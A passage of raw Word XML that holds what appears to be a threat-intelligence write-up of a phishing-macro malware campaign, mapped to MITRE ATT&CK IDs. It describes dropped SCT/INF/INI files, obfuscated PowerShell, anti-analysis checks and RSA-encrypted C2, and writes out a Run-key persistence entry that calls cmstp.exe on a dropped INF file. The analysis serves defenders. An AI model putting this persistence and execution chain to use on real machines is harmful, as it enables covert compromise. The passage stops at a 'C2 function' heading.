        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> ( </w:t>
      </w:r>
      <w:r w:rsidR="00FF3672" w:rsidRPr="00FF3672">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>T1059.005 : &lt;Command and Scripting Interpreter&gt;:Visual Basic</w:t>
      </w:r>
      <w:r w:rsidR="00FF3672">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r w:rsidRPr="00765632">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>. The process chain is shown in Figure 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D74F0F" w14:textId="73C18801" w:rsidR="00765632" w:rsidRDefault="00765632" w:rsidP="00292FA1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AC681E2" w14:textId="52054317" w:rsidR="00765632" w:rsidRDefault="00765632" w:rsidP="00292FA1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r w:rsidRPr="00765632">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Although the actual VBS script changed from sample to sample, with different levels of obfuscation and different ways of invoking the next stage of process tree, its final purpose remained same: invoking PowerShell to decode the Base64 encoded PowerShell command in the INI file that was dropped earlier by the macro, and executing it. One such example of the VBS invoking PowerShell via MSHTA is shown in Figure 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEBADFC" w14:textId="3E72436F" w:rsidR="00765632" w:rsidRDefault="00765632" w:rsidP="00292FA1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765632">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4091D9C2" wp14:editId="7BD48018">
            <wp:extent cx="6591300" cy="95758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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6639472" cy="964578"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F51B6E" w14:textId="77777777" w:rsidR="00C13980" w:rsidRDefault="00C13980" w:rsidP="00AA45FB">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63FFA44D" w14:textId="30D420A5" w:rsidR="00AA45FB" w:rsidRPr="00AA45FB" w:rsidRDefault="00AA45FB" w:rsidP="00AA45FB">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA45FB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Infection Vector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3FF9C0" w14:textId="4AE0BB63" w:rsidR="007C3DF2" w:rsidRDefault="00AA45FB" w:rsidP="00AA45FB">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA45FB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>We believe the infection vector for all of the attacks involved in this campaign are macro-based documents sent as an email attachment.</w:t>
      </w:r>
      <w:r w:rsidR="00605726">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00605726">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00605726" w:rsidRPr="00605726">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>T1566.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00605726" w:rsidRPr="00605726">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> : &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00605726" w:rsidRPr="00605726">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00605726" w:rsidRPr="00605726">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
      <w:r w:rsidR="00605726">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00605726" w:rsidRPr="00605726">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>T1204.002 : &lt;User Execution&gt;:Malicious File</w:t>
      </w:r>
      <w:r w:rsidR="00605726">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A555D31" w14:textId="68DEBE63" w:rsidR="008135A8" w:rsidRPr="008135A8" w:rsidRDefault="008135A8" w:rsidP="008135A8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r w:rsidRPr="008135A8">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>The macro in the Word document drops three files in a hard coded path: C:\programdata. Since the path is hard coded, the execution will only be observed in operating systems, Windows 7 and above. The following are the three files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E4EE33" w14:textId="77777777" w:rsidR="008135A8" w:rsidRPr="008135A8" w:rsidRDefault="008135A8" w:rsidP="008135A8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008135A8">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Defender.sct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008135A8">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> – The malicious JavaScript based </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008135A8">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>scriptlet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008135A8">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24930CB8" w14:textId="77777777" w:rsidR="008135A8" w:rsidRPr="008135A8" w:rsidRDefault="008135A8" w:rsidP="008135A8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008135A8">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">DefenderService.inf – The INF file that is used to invoke the above </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008135A8">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>scriptlet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008135A8">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385BC1CA" w14:textId="77777777" w:rsidR="008135A8" w:rsidRPr="008135A8" w:rsidRDefault="008135A8" w:rsidP="008135A8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008135A8">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>WindowsDefender.ini – The Base64 encoded and obfuscated PowerShell script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D514355" w14:textId="00AD1BEB" w:rsidR="008135A8" w:rsidRPr="008135A8" w:rsidRDefault="008135A8" w:rsidP="008135A8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008135A8">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>After dropping the three files, the macro will set the following registry key to achieve persistence</w:t>
      </w:r>
      <w:r w:rsidR="00AD37CF">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AD37CF">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00AD37CF" w:rsidRPr="00AD37CF">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>T1547.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AD37CF" w:rsidRPr="00AD37CF">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> : &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD37CF" w:rsidRPr="00AD37CF">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD37CF" w:rsidRPr="00AD37CF">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
      <w:r w:rsidR="00AD37CF">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) </w:t>
      </w:r>
      <w:r w:rsidRPr="008135A8">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11910C5E" w14:textId="77777777" w:rsidR="008135A8" w:rsidRPr="008135A8" w:rsidRDefault="008135A8" w:rsidP="008135A8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008135A8">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>\REGISTRY\USER\SID\Software\Microsoft\Windows\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008135A8">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>CurrentVersio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="42E737A0" w14:textId="5133D83E" w:rsidR="008135A8" w:rsidRPr="008135A8" w:rsidRDefault="008135A8" w:rsidP="008135A8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008135A8">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">   n\Run\"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008135A8">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>WindowsDefenderUpdater</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008135A8">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>" = cmstp.exe /s c:\programdata\DefenderService.inf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A819FDB" w14:textId="62363844" w:rsidR="008135A8" w:rsidRDefault="008135A8" w:rsidP="008135A8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008135A8">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Upon system restart, cmstp.exe will be used to execute the SCT file indirectly through the INF file. This is possible because inside the INF file we have the following section:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55196E4C" w14:textId="1D3555F8" w:rsidR="00260243" w:rsidRPr="00C60DCA" w:rsidRDefault="00260243" w:rsidP="008135A8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r w:rsidRPr="00260243">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The code of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00260243">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Defender.sct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00260243">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> file is an obfuscated JavaScript. The main function performed by the SCT file is to Base64 decode the contents of WindowsDefender.ini file and execute the decoded PowerShell Script </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00682008">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00682008" w:rsidRPr="00682008">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00682008" w:rsidRPr="00682008">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">1140 : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00682008" w:rsidRPr="00682008">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Deobfuscate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00682008" w:rsidRPr="00682008">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>/Decode Files or Information</w:t>
      </w:r>
      <w:r w:rsidR="00682008" w:rsidRPr="00682008">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00682008">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00260243">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>using the following command line:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAD98D8" w14:textId="56121A69" w:rsidR="00C60DCA" w:rsidRDefault="00535883" w:rsidP="00292FA1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r w:rsidRPr="00535883">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>The PowerShell script employs several layers of obfuscation to hide its actual functionality. In addition to obfuscation techniques, it also has the ability to detect security tools on the analysis machine, and can also shut down the system if it detects the presence of such tools.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00363B7A" w:rsidRPr="00363B7A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1562.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00363B7A" w:rsidRPr="00363B7A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : &lt;Impair </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00363B7A" w:rsidRPr="00363B7A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00363B7A" w:rsidRPr="00363B7A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;:Disable or Modify Tools</w:t>
      </w:r>
      <w:r w:rsidR="00363B7A">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8BFF98" w14:textId="0939F82C" w:rsidR="004825E9" w:rsidRDefault="004825E9" w:rsidP="004825E9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r w:rsidRPr="004825E9">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>The biggest section of the PowerShell script is XOR encoded using a single byte key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4110AA77" w14:textId="77777777" w:rsidR="00496BEF" w:rsidRDefault="00496BEF" w:rsidP="00496BEF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r w:rsidRPr="00496BEF">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>The second section of the PowerShell script has the ability to perform encryption and decryption of messages that are exchanged between the system and the C2 server. The algorithm used for encryption and decryption is RSA, which leverages the public and private key exponents included in Section 1 of the PowerShell script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65712AD1" w14:textId="72A5568C" w:rsidR="007F777D" w:rsidRDefault="00496BEF" w:rsidP="00496BEF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="00496BEF">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>T1132.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00496BEF">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> : &lt;Data Encoding&gt;:Standard Encoding , T1071.001 : &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7547CFF6" w14:textId="02DBBF7E" w:rsidR="007F777D" w:rsidRDefault="007F777D" w:rsidP="00496BEF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] Example </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> functionality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434DE957" w14:textId="628B7E74" w:rsidR="007F777D" w:rsidRPr="00535883" w:rsidRDefault="007F777D" w:rsidP="00496BEF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="236C0D4B" w14:textId="77777777" w:rsidR="00B14585" w:rsidRDefault="00B14585" w:rsidP="004B5FA9"/>
    <w:p w14:paraId="7BCA116A" w14:textId="77777777" w:rsidR="008F0B7F" w:rsidRDefault="008F0B7F">
      <w:r>
        <w:t>[2] C2 function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC35B75" w14:textId="77777777" w:rsidR="008F0B7F" w:rsidRDefault="008F0B7F" w:rsidP="008F0B7F">
      <w:r>
